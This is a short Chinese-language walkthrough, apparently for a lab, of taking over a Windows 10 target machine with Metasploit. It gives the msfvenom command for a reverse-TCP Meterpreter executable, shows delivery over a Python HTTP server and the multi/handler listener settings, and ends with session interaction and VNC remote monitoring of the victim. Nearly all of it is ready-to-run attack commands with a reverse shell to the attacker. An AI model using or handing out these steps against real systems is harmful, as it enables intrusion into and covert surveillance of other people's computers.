一、环境
kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3
二、具体步骤
1、管理员权限打开终端

2、生成可执行文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe

3、在目标靶机下载生成的test.exe程序
1)在kali执行python3 -m http.server

2)在目标靶机进行下载

4、执行msfconsole命令

5、配置参数
use exploit/multi/handler(选择模块)
set payload windows/meterpreter/reverse_tcp(选择攻击模块)
set LhOST 本地ip
set lport 指定端口号
show options(查看配置的参数)
exploit -z -j(后台执行)
6、在靶机运行可执行程序test.exe

7、执行sessions查看上钩的用户

8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑
9、运行run vnc -i进行远程监控靶机

